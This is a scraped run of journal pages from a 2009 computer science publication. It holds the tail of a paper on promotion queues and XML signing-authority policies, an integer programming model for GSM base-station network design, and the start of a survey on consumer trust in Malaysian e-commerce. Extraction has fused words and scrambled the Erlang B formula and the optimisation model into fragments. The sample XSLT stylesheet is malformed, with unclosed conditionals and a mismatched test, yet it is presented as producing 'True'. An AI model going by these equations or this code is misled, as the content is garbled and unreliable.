P (i) : Probability of exactly i customers inqueueing system.
L : Expected number of customers in thequeueing system.
LS : Average waiting in the system..
III. QUEUING MODEL IMPLEMENTATION
When a person joins in an organization, he becomes authorize to take some decisions on behalf of that organization; means he is given
some authority to exercise. After some time, onthe basis of his performance in the organization,he is given promotion and he becomes eligible toexercise to some higher authorities. And further,he may get some higher promotion or he mayleave the organization. So, during his stay in theorganization, the authority of that person variesfrom the time he joins the organization untilhe/she leaves the organization. This paper
presents the variation in authorities of a person in
ISSN 1947 5500143
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 150/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol.4, No. 1 & 2, 2009
the organization. The method implements thequeuing model to analyze the various people inthe queue of their promotion and looks at various
parameters like average waiting time etc.
A. Assumptions
• Let’s take three queues implementingthree level (for simplicity we have takenonly three level hierarchy) various levelof the employees in the organization
L1: Contain employees of the organizationwho just join,
L2: Contain employees at the second levelafter their promotion from first level i.e, firstqueue L1, and
L3: contains employees at next higher level promoted from previous level. i.e L2.
• For every level, Decide λ n rate at which person are coming into the system andμn denotes the rate at which person aregoing out of the system.
The below mentioned Figure1 shows variouslevels in the system where employees happens to
be in the queue of promption.
Figure1. Levels of Various Queues
IV. XML POLICY FOR THE USER
The xml policy for the user containsinformation about the user who is signing thedocument the policy may contain informationlike user identification, his hierarchy or designation, his authorities for whether he has
the power of signing this document or not if yesin what capacity.
There is a database maintained in theorganization of xml policies for verification of
proper authority for the person who is exercisinghis/her the document. The structure of database is
as shown in the table 1. The first column tabledescribes the Employees identification number given by the organization and the second columndescribes the XML policies associated with the
person for verifying his/her authorities.
Table 1 An Authority database
Employees ID XML policies
0
1
The example of authorization policies [9] can be describing a person signing capabilities can be
<Policy>
<user>
<name>smith</name>
<id>1</id>
<designation>manager</designation>
<signing_limit>1000</ signing_limit>
</user>
</Policy>
V. AUTHORITY VARIATION
When the person in an organization movefrom one level to other level their authoritychanges. For example, authority to reviewdocument, authority to sign document, authorityto review people performance etc. The authoritydatabase for a person who got promotion should
be updated. So, the table 1 records all the changesin person authorities and when person exercisehis/her authority this table is referred and the
policy for that person is verified according to the
following stylesheet code.
<?xml version = "1.0"?>
<xsl:stylesheet version ="1.0"xmlns:xsl="www.w3.org/1999/XSLT/Transform">
<xsl:output method='html'/>
<xsl:template match="/">
Level L1
Level L2
Level L3
ISSN 1947 5500144
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 151/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol.4, No. 1 & 2, 2009
<html>
<body>
<xsl: select = "//" />
<xsl:if test= "user/name='smith'">
<xsl:if test= "user/id='1'">
<xsl:if test= "user/designation='manager'">
<xsl:if test= "user/designation='1000'">
<table border="1">
<tr bgcolor = "#1acd31"><td>
!Access allowed
</td></tr></table>
</xsl:if>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
OUTPUT: True
The above result ‘True’ means that the personhas exercised the right authority.
VI. CONCLUSION
We have presented the variation in authoritiesof a person in the organization as he moves from
one higher level to other higher level means from
one queue to another queue of promotion. Wehave implemented the queuing model to analyzethe various people in the queue of their
promotion and looked at various parameters likeaverage waiting time. The method alsoimplements the authority policy as a database of XML policies so that they can be referred at the
time of taking decision about the authority of enemployee.
VII. APPLICATION AND FUTURE SCOPE
The above scheme can be applied in anyorganization where people exercise their authorities in an online manner not on paper.This is a scheme to be applied in an environmentwhere electronic documents are mostly producedin every process and also, when people exchangetheir document outside the organization for doingcontracts, paying payments etc. In the later casethe policy database need to be maintained at both
end but with policies made in such a way thatdoes not expose the sensitive organization details,we can consider this case as an extension of theabove scheme.
ACKNOWLEDGMENT
We thank Dr I. J. Kumar, Principal, BharatiVidyapeeth’s college of Engineering, New Delhifor his encouragement and support in carrying outthe work.
IMPLEMENTATION AND R ESULTS
For Case 1:λ n =6
μn =2
The output shows the probabilities of person in the system. Andaverage time of the system.
Case 2:λ n =8
μn =3
ISSN 1947 5500145
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 152/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol.4, No. 1 & 2, 2009
The below Snapshot shows the for XML Policy verifications
Snapshot 1: Checking the Syntax of XML Code
Snapshot 2: Checking the Syntax of XML Code
REFERENCES[1] [1] A.M. Fischer, Electronic Document Authorization”Proc.13th
{NIST}-{NCSC} National computer security conference, Pages 62-71,1990.
[2] S.Rusell,” Audit-by-receiver paradigms for verification of authorization
at source of electronic documents”, Computer and security, Volume 13,Issue 1, February 1994, Pages: 59 – 67.
[3] Thomas Y.C. Woo, Simon S. Lam,”Authentication for distributedsystems” IEEE Comput., Jan 1998, Pages 39-52
[4] Michiharu and Satoshi,”XML document security based on provisionalauthorization”, Proceedings of the 7th ACM conference on Computer and communications security table of contents, Athens, Greece, 2000,Pages: 87 – 96.
[5] Patroklos G. Argyroudis and Donal O’Mahony,”Towards flexibleauthorization management”, Proc. ISSC 2005, IEEE Computer Society,Pages: 421-426
[6] Torsten Braum, Hahnsand Kim,” Efficient authentication andauthorization of mobile users based on peer - to - peer network mechanism”, International Conference on system sciences, IEEE 2005,Page: 306.2
[7] E. Bertino, F. Buccafurri, D. Ferrari, and P. Rullo, “An Authorization
Model and Its Formal Semantics," Proc. 5th European Symposium onResearch in Computer Security", 127-142 (September 1998).
[8] Burrows,” Method and apparatus for XSL/XML based authorizationrules policy implementation”, United States Patent Application 2005-0102530A1
[9] J. Mukherjee, W. Atwood, “XML Policy Representation secureMulticast” Proceedings of the IEEE SoutheastCon 2005 Conference,Fort Lauderdale, Publication Date: 8-10 April 2005,Page(s): 580- 587
[10] Other Notationhttp://www.andrewferrier.com/oldpages/queueing_theory/Andy/other_notation.html
[11] Basic Terminology of Queueing Theory
http://www.andrewferrier.com/oldpages/queueing_theory/Andy/terminology.html
[12] Sanjay k. Bose. “An Introduction to Queueing Systems”
AUTHORS PROFILE
M.N.Doja is a professor in Computer Science and engineering Department,Jamia Millia Islamia, New Delhi, India. he has been the Head of Department and Chairperson for research and development board for thesame department, for several year.
Dharmender Saini received his B.Tech. from T.I.T&S in Computer Sciencein 1999 and M.Tech.in 2006 in Computer science and engineering fromGuru jhambheswar university, hissar. During 2000-2007, he stayed inBharati Vidyapeeth College of Engineering as Lecturer and AssistantProfessor, Presently persuing PhD from Jamia Millia IslamiaUniversity,New Delhi,India
ISSN 1947 5500146
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 153/215
A Novel Model for OptimizedGSM Network Design
Alexei Barbosa de Aguiar, Plácido Rogério Pinheiro,Álvaro de Menezes S. Neto, Ruddy P. P. Cunha, Rebecca F. PinheiroGraduate Program in Applied Informatics, University of FortalezaAv. Washington Soares 1321, Sala J-30, Fortaleza, CE, Brazil, 60811-905alexei@verde.com.br, placido@unifor.br, netosobreira@edu.unifor.br,
ruddypaz@hotmail.com, becca.pin@gmail.com
Abstract – GSM networks are very expensive. The
network design process requires too many
decisions in a combinatorial explosion. For this
reason, the larger is the network, the harder is to
achieve a totally human based optimized solution.
The BSC (Base Station Control) nodes have to be
geographically well allocated to reduce the
transmission costs. There are decisions of
association between BTS and BSC those impacts
in the correct dimensioning of these BSC. The
choice of BSC quantity and model capable of
carrying the cumulated traffic of its affiliated BTS
nodes in turn reflects on the total cost. In addition,
the last component of the total cost is due to
transmission for linking BSC nodes to MSC.
These trunks have a major significance since the
number of required E1 lines is larger than BTS to
BSC link. This work presents an integer
programming model and a computational tool for
designing GSM (Global System for Mobile
Communications) networks, regarding BSS (BaseStation Subsystem) with optimized cost.
Key words: GSM mobile network design, cellular
telephony, Integer Programming (IP), Operations
Research.
I. INTRODUCTION
The GSM mobile networks have a verysophisticated architecture composed bydifferent kind of equipments [14].
One of the most important of theseequipments, located at the core of the network,is MSC (Mobile Switching Center). MSC hasmany vital duties like register and unregisterMS (Mobile Station), analyze call destinations,route calls, handle signaling, locate MS throughpaging, control handover, compress and cryptvoice, etc. Indeed, it is one of the mostexpensive components of the network.
The HLR (Home Location Register) worksas a subscriber database, storing informationconcerning its state, location, parameters andservice data. It is constantly queried andupdated by MSC.
The SGSN (Serving GPRS Support Node)are analogous to MSC but are dedicated to the
packet data transmission services instead of handling voice calls. Many of its mechanics areidentical or similar to its voice counterpart anddeals with HLR as well.
Hierarchically below each MSC we haveBSC (Base Station Controller) nodes. They arenot present in IS-136 (TDMA) networks. BSCreduces the cost of the network. One of thereason is that it concentrates the processingintelligence of BTS (Base Transceiver Stations)nodes, which are the most numerous and spreadequipments. Other impacting factor is that,although BSC depends on MSC for manyactivities, it is the first layer telephony switch,geographically concentrating traffic. This meansthat the trunks that carries the traffic from BSCto MSC are statistically dimensioned based onErlang’s traffic theory instead of one-by-onechannel fashion.
The BTS radiates the RF (Radio Frequency)signal to the mobile phones and receive itssignal back. Antennas in the top of towers orbuildings radiate this RF, creating coverageareas called cells. The geographical allocationof BTS is guided by RF coverage and trafficdemand.
Fig.1. Mobile Network Design
The focus here will be concentrated in the
BSS (Base Station Subsystem) which faces theradio resources towards MS. BSS is the groupof equipments and softwares that integrates BSC
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 154/215
nodes, BTS nodes and MSC. Transmissionnetwork plays an important role on linking themall.
The network design usually starts at the cellplanning department. The coverage arearequired given to cell planning engineer team
and the traffic is estimated by geographicregions. This region’s traffic density variationcan be very wide.
When coverage is the goal, RF engineerslook for sites with high altitudes and free of obstacles to reach larger distances. On the otherhand, when the goal is traffic, hotspots aredistributed with full equipped BTS nodes. Itsradio channel’s power is configured lower andthe RF irradiation is directed to the “near”
ground with a higher antenna tilt angle.
In urban areas the BTS proximity is limitedby interference since there is a limited numberof RF channels and they are repeated on and onalong the coverage area. The BTS sites areallocated in a triangular grid pattern, where it ispossible. This allocation is due to the coveragepattern of its tree groups of antennas, disposedwith 120º angles between then.
Once all BTS placements are determined withits correspondent channel dimensioning, it ispossible to plan how many BSC nodes are need,witch capacity each one may have and itsgeographical allocation. All this factors are
highly related to the choices of which BTSnodes are linked to which BSC nodes.
The links between BTS and BSC are E1lines that hold voice channels slots. They areconfigured deterministically in a one-to-onebasis, regarding the radio channels slots of theBTS. It is called Abis interface.
On the other hand, trunks that link BSC toMSC are E1 lines dimensioned by the totaltraffic from all of its BTS. It is called Ainterface. These trunks are similar to trunksbetween two MSC or other conventional
telephony switches. The voice channels in thesetrunks are seized statistically by demand and thetotal number of busy channels varies during theday. All calls must pass through the MSC, evenwhen both subscribers are very close, in thesame BTS and BSC area.
The Erlang B formula calculates theblocking probability (or congestion, or Grade of Service GoS) to a given number of resources(voice channel, normally) and offered traffic.
Each one of the three variables in thisformula can be calculated from the two others
depending on the context. The percentile of calls that are lost can be calculated for a given
number of voice channels available in someequipment and the measured traffic. To solve acongestion scenario this formula provides thenumber of channels that would be necessary toflow this traffic for a maximum tolerable GoS(2%, for instance). Other possibility is to
calculate how much traffic can be carried with agiven number of channels and the desired GoS.
The Erlang B formula eq. (1) is shownbelow:
i!
a
n!
a
=ei
Σ
n
=i
n
b
0
(1)
be is the probability of blocking, also known asGoS, n is the number of resources (voicechannels in this case) and a is the amount of traffic offered in Erlangs.
Besides channel resources, some BSC have adeterministic way of allocation for other kind of resources. When a new radio channel is installedin a BTS, some required resources (processorand memory, for instance) are associated withthis new radio channel in a fixed way. Theseresources are compromised with the radiochannel, even though it is idle. Thus, this kind
of BSC has a fixed maximal capacity, forinstance, 4096 radio voice channels (slots).
Some more modern BSC uses a pool of resources that are associated to radio voicechannels on demand, when a call is made. Thisfeature increases the BSC capacity. Using thistype of BSC, its maximum capacity cannot bedetermined by its number of radio channels, butby its traffic in Erlangs. For instance, the 4096radio voice channel BSC could be equivalent toa 4058 Erlangs (at 2% GoS) BSC model, withvirtually unlimited number of radio voice
channels, depending on their traffic demand.So the A interface from BTS to BSC is made
of deterministic channels in E1 lines. Theselines waste transmission resources. Moreover,the A interface from BSC to MSC is made of statistical channels in E1 lines. These lines aremore efficient.
It was said that BSC reduces transmissioncosts, but they themselves represents networkdesign costs. It is a design tradeoff. The moreBSC we distribute along the coverage area, thelower are transmission costs, since the distances
between BTS to BSC decreases. On the otherhand, the BSC has its acquisition cost. Thebalance between these two costs is reached with
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 155/215
the optimal geographical allocation of the BSC,associated with its correct choice of model thathas its respective capacity and cost.
A typical GSM network has hundred orthousand BTS and tens or hundreds of BSC.The human capacity of designing efficient
networks with such magnitudes is very limitedand the network costs are high. The use of computational tools can reduce these costsradically. That is what is proposed here.
II. THE INTEGER PROGRAMMING MODEL
This is an Integer Programming model [8]capable of minimizing the total network costand providing the design solution to achievethis minimal cost.
m32t , ,t ,t ,t =T
1
BTS nodes;
n32 b , ,b ,b ,b= B1
BSC nodes;
o32 w , ,w ,w ,w=W 1
BSC models;
p21 c , ,c ,c ,c=C ...0
Link capacities;
x ij Decision variables for link allocationbetween BTS node i and BSC node j;
y lc Decision variables for choosing thecapacity c of E1 (2 Mbps) lines between BSC land MSC;
z lw Decision variables for BSC l model
w choice.ct ij Link cost between BTS i and BSC j
nodes in an analysis time period;cmlc Link cost of capacity c between
BSC l nodes and MSC in an analysis timeperiod;
cb w BSC model w acquisition cost,
considering an analysis time period;a i BTS i traffic demand in Erlangs;
f c Link capacity c in Erlangs;
ew BSC model w traffic capacity inErlangs.
A. Objective Function
The objective function eq. (1) minimizestotal cost of links between BTS and BSC, pluscost of E1 lines between BSC nodes and MSC,plus total cost of BSC's acquisition.
Bd W k
dk k
Bl C c
lclc
T i B j
ijijzcb+ ycm+ xct minimize (1)
B. Restrictions
In eq. (2), each BTS must be connected to oneand only one BSC:
T i= x B j
ij 1, (2)
In eq. (3), the y lc dimensioning is made. Itallows all traffic from BTS assigned to one BSCto flow over its links:
Bl , y f a xC c
lcc
T i
iil (3)
In eq. (4), the BSC dimensioning is madeaccordingly to the given models and the totaltraffic demand.
B j , zea xW k
jk k
T i
iij (4)
0,1ij x , T i B j (5)
0,1lc y , Bl C c (6)
0,1lw z , Bl W k (7)
III. MODEL APPLICATION
This model has some issues in realapplications that must be observed.
The set of BTS nodes T is known previouslybecause RF engineers make its design as thefirst step. Its geographical location isdetermined by coverage and trafficrequirements. Its traffic demand can be knownpreviously by measuring other mobile network(old one that is being replaced, or by otheroverlaid technology such as TDMA (TimeDivision Multiple Access) or CDMA (Code
Division Multiple Access). When such datasource is not available, this traffic demands canbe estimated by average subscriber traffic andnumber of subscribers forecast based onpopulation and marketing studies.
The set of BSC nodes B can be generatedbased on all feasible sites possibilities. The sitesthat will have a BTS are good candidates, sinceits space will be already available by rental orbuy. Other company buildings can be added tothis set. The set B represents all possibilities,and not necessarily the actual BSC allocations.
The more options this set B has, the better theallocation of the needed BSC nodes tends to be.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 156/215
The set W contains the available models of BSC. Normally a BSC manufacturer offersdifferent choices of models. Each one has itscapacity in Erlang (as it was modeled here) andprice.
The set C is a table of traffic capacities foran integer quantity of E1 lines. Each E1 line hasa number of timeslots allocated for voice fromthe 31 available. Other timeslots are used forsignaling and data links. Thus, the first E1 linemay have a different number of voice timeslotsthan the second E1 line, and so on. Each voicetimeslot carries 4 compressed voice channels,so called sub-timeslots.
The elements of the set C are calculated bythe reverse Erlang B formula, taking the numberof voice channels and the defined GoS asincoming data and the traffic as outgoing data.The first element of set C is 0 E1 lines, which
lead to 0 Erlang. The second element of set C is 1 E1 line and has a calculated traffic for 4times the number of timeslots allocated forvoice in this E1 line. This is because eachtimeslot has 4 sub-timeslots. The third elementof set C is 2 E1 lines and has the trafficcalculated for 4 times the number of timeslotsallocated for voice in all 2 E1 lines, and so on.The size of the set C is determined by themaximal capacity of the larger BSC model.
The link costs ct and cb in a given periodof analysis must be determined by thetransmission network ownership and/orcontract. If the transmission network belongs tothe own mobile company, its cost can bedetermined by a set of distance ranges or as aconstant times the distance, plus an equipmentfixed cost. If the mobile company contractstransmission lines from other company, thecosts must be calculated based on specificcontractual rules. For instance, discounts basedon quantity can be applied.
This integer programming model can beadapted to work with BSC that has maximumnumber of radio channels capacity, instead of maximum traffic capacity as presented.
IV. COMPUTATIONAL RESULTS
Simulations were made with many networksizes. The largest network size that could besolved in a reasonable time has about 50 sites.The different generated data caused bigdifferences in the solving time. For instance:The smaller solving time for 50 sites with 3201
integer variables and 150 restrictions was 42.04seconds, while other equivalent probleminstances caused solver to spent more than 30
minutes to solve.
The data was generated using the followingassumptions:
The transmission cost was calculatedmultiplying the link distance by a constant.
Local market cost approximations were used.The cost of n E1 line in the same link is
assumed to be n times the cost of each E1line.
The BTS and MSC site geographicallocations where generated randomly. Foreach BTS site, a BSC site candidate wasgenerated. The traffic of each BTS wasgenerated randomly from 0 to 80 Erlangs thatis the approximated value that a BTS canhandle with 1 E1 line.
The set C was generated with 41 values,from 0 E1 lines until 40 E1 lines. For eachcapacity, the corresponding traffic wascalculated accordingly to the exposed in themodel application session (3).
Three BSC models where used in thesesimulations: Small, medium and large with512, 2048 and 4096 Erlangs of capacityrespectively. Each one had an acquisitioncost compatible to the local market reality.
OPL integrated modeling environment andCplex 10.0 solver library [9] from Ilog Inc. were
used in the simulations. OPL ran in a 64 bitsIntel Core 2 Quad processor with 2.4 GHz clockand 4 GB of RAM memory.
Despite the fact that 50 sites is a very smallproblem instance comparing to hundreds oreven thousand sites of the real mobile networks,the simulations shown that this model worksproperly for the desirable purpose. Varying thecosts, more or less BSC were allocated. EachBSC model was correctly chosen accordingly tothe total traffic demanded by all BTS allocatedto this BSC. The distances were minimizedindirectly because of the linear cost by
kilometer. The trunk between BSC and MSCwas dimensioned to carry the total trafficdemand by BSC, and its distance to MSC waseffectively considered, since the amount of E1lines was greater than one.
The 20 problem instances were created andsolved for each number of BTS sites varyingfrom 5 until 50 with steps of 5. The data weregenerated randomly following the premisesdescribed in this section. The results are shownin table 1.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 157/215
V. SCALABILITY ANALYSIS
Due to the wide range of random generatedvalues, the problem instances have very highcomplexity variations. Thus, there wereproblem instances with 40 BTS that could notbe solved within a reasonable time threshold.
Some times the solver crashed because of memory lack. But, for the same reason, thereare problems instances larger than 50 BTS thatcan be solved in a time interval even smallerthan some particular instances of 40 BTS.
The proposed model here is an IntegerProgramming one. The discrete nature of thevariables requires an algorithm like Branch-and-bound, Branch-and-cut or others. This sortof algorithms has an exponential complexity.This fact limits the larger instance size that canbe handled. Actual networks often havehundred of BTS that is far beyond the range of
this exact method. Aguiar and Pinheiro [13]used Lingo solver library and it was not able tohandle problem instances larger than 40 BTS.The adoption of Cplex [9] expanded thisboundary to 50 BTS, but it remains too small.
A mean squares non-linear regression of theaverage times was made to determine theobserved asymptotic complexity function. It isshown on eq. 8 and fig. 2.
The key to break this limitation and turn big
network designs feasible is to use approximateapproaches. Some methodologies likeLagrangean relaxation in Simple Subgradient,Bundle Methods and Space Dilatation Methods(Shor et al [6, 7]) can be used. Rigolon et al [3]show that the use of this tool in the first modelextends the size of the largest mobile network tobe designed. A framework that hybridizes exactmethods and meta-heuristics has presented goodresults in expanding these boundaries in otherclasses of problems. Nepomuceno, Pinheiro andCoelho [11] used this framework to solvecontainer loading problems. In the same
problem category, Pinheiro and Coelho [12]presented a variation of the implementation towork with cutting problems.
VII. CONCLUSION
This work gave a solution to the BSSnetwork design problem of mobile GSMcarriers capturing its essence in a mathematicalmodel. In introduction section sometelecommunications background was given tohelp understanding the model. Then, the modelwas presented and explained.
Table 1 - Results
After the model presentation, its applicationwas shown explaining how to relate technicaldetails of the real world with the model's datageneration.
In computational results section, size andperformance simulations were described. Thescalability was analyzed lead to someconclusions. This model by itself can't be usedon real networks because of its limitation.
Simulation with real networks can't show theoptimization potential because small networkscan be well designed by human intuition andhave smaller costs. Some methodology must beapplied to extend the size of the problems toachieve hundred or thousand BTS sites. Thus,the optimization gain can be very effective.
BTS Var. Const. DensityAvg.
Time
Std.
Deviation
5 96 15 9,72% 50,0 12,773
10 241 30 5,95% 40,0 8,208
15 436 45 4,43% 332,0 28,802
20 681 60 3,57% 853,5 86,418
25 976 75 3,01% 3561,5 371,594
30 1321 90 2,60% 19689,0 2872,227
35 1716 105 2,29% 46287,5 4890,274
40 2161 120 2,05% 600431,1 80263,118
45 2656 135 1,86% 363032,5 44981,655
50 3201 150 1,70% 752724,0 87873,235
y = 0,851e0,244x (8)
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 158/215
Fig. 2. Average time versus instance size
BIBLIOGRAPHICAL REFERENCES
[1] Kubat, P e Smith, J. MacGregor. “A multi-periodnetwork design problem for cellular telecommunicationsystems”. European Journal of Operational Research,134:439-456, 2001.[2] Kubat, P., Smith, J. MacGregor e Yum. C. “ Design of
celullar networks with diversity and capacity constraints”.IEEE Transactions on Reability, 49:165 – 175, 2000.[3] Rigolon, A. A., Pinheiro, P. R., Macambira, E. M.,
Ferreira, L. O. R. A. Approximate Algorithms in MobileTelephone Network Projects. International Conference onTelecommunications and Networking, Bridgeport, SpringerVerlag, 2005, v. XV, p. 234-347[4] Rodrigues, S. I. M. Relaxação Lagrangeana esubgradientes com dilatação de espaço aplicados a umproblema de grande porte. RJ, 1993.[6] Shor, N. Z.Utilization of the operation of spacedilatation in the minimization of convex functions.Cybernetics, 1:7-15, 1970.[7] Shor, N. Z. Zhurbenko, N. G. A minimization methodusing the operation of extension of the space in the directionof the difference of two successive gradients. Cybernetics,7(3):450-459, 1970.[8] Wolsey, L. A. Integer programming. John Wiley &Sons, 1998.
[9] ILOG. ILOG CPLEX 10.0 User's Manual, January 2006.[10] Shrage, L., Optimization Modeling with Lingo. LindoSystems Inc., 1998.[11] N. V. Nepomuceno, P. R. Pinheiro, A. L. V. Coelho.Tackling the Container Loading Problem: A HybridApproach Based on Integer Linear Programming andGenetic Algorithms. Lecture Notes in Computer Science, v.4446, p. 154-165, 2007.[12] N. V. Nepomuceno, P. R. Pinheiro, A. L. V. Coelho. AHybrid Optimization Framework for Cutting and PackingProblems: Case Study on Constrained 2D Non-guillotineCutting. In: C. Cotta and J. van Hemert. (Org.). RecentAdvances in Evolutionary Computation for CombinatorialOptimization. Berlin / Heidelberg: Springer-Verlag, 2008,v. 153, p. 87-99.
[13] A. B. de Aguiar and P. R. Pinheiro. A Model for GSMMobile Network Design, chapter Innovative Algorithms andTechniques in Automation, Industrial Eletronics andTelecomunications, pages 365-368. Springer Netherlands,Dordrecht, September 2007.[14] M. Mouly and M.-B. Pautet, GSM ProtocolArchitecture: Radio Sub - system Signaling , IEEE 41stVehicular Technology Conference, 1991
y = 0,851e 0,244x
0,00
100,00
200,00
300,00
400,00
500,00 600,00
700,00
800,00
0 5 10 15 20 25 30 35 40 45 50 55
average time (s)
Expon. average time(s)
Number of BTS
Average Time Time
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 159/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
A Study on the Factors That Influence the
Consumers’ Trust on E-commerce Adoption
Yi Yi ThawDepartment of Computer and Information Sciences
Universiti Teknologi PETRONAS,
Tronoh, Perak, Malaysia
Ahmad Kamil MahmoodDepartment of Computer and Information Sciences
Universiti Teknologi PETRONAS,
Tronoh, Perak, Malaysia
P.Dhanapal Durai Dominic
Department of Computer and Information Sciences
Universiti Teknologi PETRONAS,
Tronoh, Perak, Malaysia
Abstract —The development of electronic commerce is
characterized with anonymity, uncertainty, lack of control andpotential opportunism. Therefore, the success of electronic
commerce significantly depends on providing security and
privacy for its consumers’ sensitive personal data. Consumers’
lack of acceptance in electronic commerce adoption today is not
merely due to the concern on security and privacy of their
personal data, but also lack of trust and reliability of Web
vendors. Consumers’ trust in online transactions is crucial for the
continuous growth and development of electronic commerce.
Since Business to Consumer (B2C) e-commerce requires the
consumers to engage the technologies, the consumers face a
variety of security risks. This study addressed the role of security,
privacy and risk perceptions of consumers to shop online in order
to establish a consensus among them. The analyses provided
descriptive frequencies for the research variables and for each of
the study’s research constructs. In addition, the analyses werecompleted with factor analysis and Pearson correlation
coefficients. The findings suggested that perceived privacy of
online transaction on trust is mediated by perceived security, and
consumers’ trust in online transaction is significantly related with
the trustworthiness of Web vendors. Also, consumers’ trust is
negatively associated with perceived risks in online transactions.
However, there is no significant impact from perceived security
and perceived privacy to trust in online transactions.
Keywords-perceived security and perceived privacy; perceived
risk; trust; Web vendors; consumer behavior.
I. INTRODUCTION
This study focuses on the aspect of e-commerce thatutilizes the Internet and World Wide Web (WWW) as thetechnological infrastructure to communicate, distribute andconduct information exchange that would consequently lead tothe commercial transactions between Web vendors andconsumers. In addition, this study would likely to identify themain security and privacy issues concerns and thetrustworthiness of the Web vendors to engage in e-commercetransaction and the effectiveness of security methods andapplications in ensuring the confidentiality, integrity and
privacy of e-commerce transactions. The present research
intends to identify the factors which are directly related toconsumers’ trust to adopt e-commerce in Malaysia. Therefore,this study is undertaken to answer the following researchquestions: Do consumers’ security and privacy concerns of online transaction significantly relate to their trust in e-commerce adoption? How do the trustworthiness andreliability of the Web vendors relate to the consumers’adoption of e-commerce? What are the inter-relationships of security and privacy concerns, trust beliefs and risk perception, and how do these factors affect consumers’behavior intention to adopt e-commerce?
II. LITERATURE REVIEW
E-commerce has gained considerable attention in the pastfew years, giving rise to several interesting studies andindustrial application, due to the Internet has created enormouschange in the business environment. The MalaysianGovernment has made a massive move by launching theMultimedia Super Corridor (MSC) whereby one of its sevenflagship applications includes the active promotion of theelectronic business activities in the country. However, theacceptance level of the electronic commerce by the Malaysianconsumers is still regarded very low compared to the otherparts of the world especially the developed countries like theUnited States and the European Union. For example, theSmall- and Medium-Sized Industries Association of Malaysiasaid in late 2005 that less than 5% of its members wereinvolved in B2C business. According to Krishnan [1], themajority of Malaysians interested in e-commerce are males(66%) and males below 30 years (42%) is the largestindividual group of Malaysians interested in e-commerce.
Considerable numbers of research findings [2], [3] and [4]have indicated that although e-commerce is spreadingworldwide, customers are still reluctant to deal with it becauseof the security and privacy issues. A study of consumer-perceived risk in e-commerce transactions by Salam et al. [5]indicated that consumers simply do not trust online vendors to
Universiti Teknologi PETRONAS, MALAYSIA
153 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 160/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
engage in transactions involving money and personalinformation. According to the authors, consumer-perceivedrisk is reduced with the increase in institutional trust andeconomic incentive.
Ahmed et al. [6] surveyed that the major concerns on e-commerce adoption in Malaysia are: security and privacy overonline transaction process and trust and reliability of onlinevendors. They suggested that in order to be successful in
electronic marketplace, the organizations are expected toexpend their resources and exert efforts to ensure thatconsumers’ concerns are adequately addressed. Dauda et al. [7] studied the perceived e-commerce security influence onadoption of Internet banking, and the role of nationalenvironmental factors such as attitude, subjective norms, andperceived behavioral control factors towards adoption, andcompares these factors with Singapore Internet bankingadoption. They found that consumer perceived non-repudiation, trust relative advantage Internet experience andbanking needs are the most important factors that affectadoption in Malaysia. Organizations were reluctant to use e-commerce as they felt that the transactions conductedelectronically were open to hackers and viruses, which were
beyond their control. Khatibi and Scetharaman [8] mentionedthat Malaysian e-commerce industry has not taken off asexpected. By means of a survey of 222 Malaysianmanufacturers, traders and service providers, the authorsconcluded that from the company’s point of view, the mainbarriers of e-commerce adoption are: concern on security andprivacy followed by the hustle of keeping up with thetechnology, uncertainties regarding rules and regulations, highset up cost of Ecommerce, lack of skilled workers and so on.The authors suggest that any policy that aims at promoting e-commerce should take these factors into consideration.
According to mid-2005 survey conducted by theMalaysian Communications Multimedia Commission
(MCMC), only 9.3% of internet users had purchased productsor services through the internet during the preceding threemonths [9]. The primary reasons cited for this are: lack of security and privacy of consumers’ personal data includingcredit card number, identity theft, virus, break-in attacks,denial-of-service, and so on. Lincoln Lee [10], Senior Analyst,Telecommunication Research, IDC Malaysia, mentioned that“the Malaysia ecommerce market has exhibited a healthygrowth rate of 70% in 2006 in comparison with that in 2005.However, in order to ensure sustainable growth, there is stillplenty of work to be done to develop this industry into amature market”. Jawahitha [11] raised serious concern on theprotection of Malaysian consumers dealing with e-commercetransactions. According to her, the existing laws pertaining to
conventional businesses are not sufficient to address the issuesin e-commerce. Malaysian government has already taken stepsto pass new laws and to amend some of the existing laws anduntil this effort is materialized, the Malaysian electronicconsumers would not be having adequate protection. Toprotect e-commerce consumers’ privacy, Malaysian legislatorshave devised a personal data protection bill [12]. The authorexamined the nature, manner and scope of personal dataprotection under this Bill. She suggests that instead of beingconcerned with the full range of privacy and surveillance
issues, the Bill deals only with the way personal data iscollected, stored, used and accessed.
